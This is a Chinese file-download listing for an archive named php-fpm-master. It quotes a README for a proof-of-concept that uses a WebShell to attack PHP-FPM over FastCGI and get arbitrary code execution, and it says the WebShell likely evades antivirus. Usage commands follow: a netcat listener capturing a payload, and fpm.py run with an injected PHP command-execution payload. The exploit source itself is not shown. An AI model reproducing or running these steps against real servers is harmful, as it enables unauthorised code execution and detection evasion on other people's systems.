文件名称:php-fpm:用WebShell攻击PHP-FPM用WebShell攻击PHP-FPM
文件大小:176KB
文件格式:ZIP
更新时间:2024-03-31 08:27:00
Python
用WebShell攻击PHP-FPM 来自大佬的文末一个想法 快速实现了一个poc,可以实现任意代码执行 后续用单文件PHP实现一个FastCgi Client,然后已知PHP文件就用WebShell本身,没有什么骚操作的话WebShell应该就是免杀的 使用 测试php7.3-fpm,在TCP模式和本地socket都可以运行 echo "<?php echo 1; ?>" > /tmp/poc.php nc -lvp 6666 > payload.txt python fpm.py -c '<?php echo `id`; exit;?>' -p 6666 127.0.0.1 /tmp/poc.php 运行poc.php php poc.php 参考 fpm.py来自
【文件预览】:
php-fpm-master
----poc.php(416B)
----poc.png(175KB)
----fpm.py(8KB)
----.gitignore(12B)
----readme.md(866B)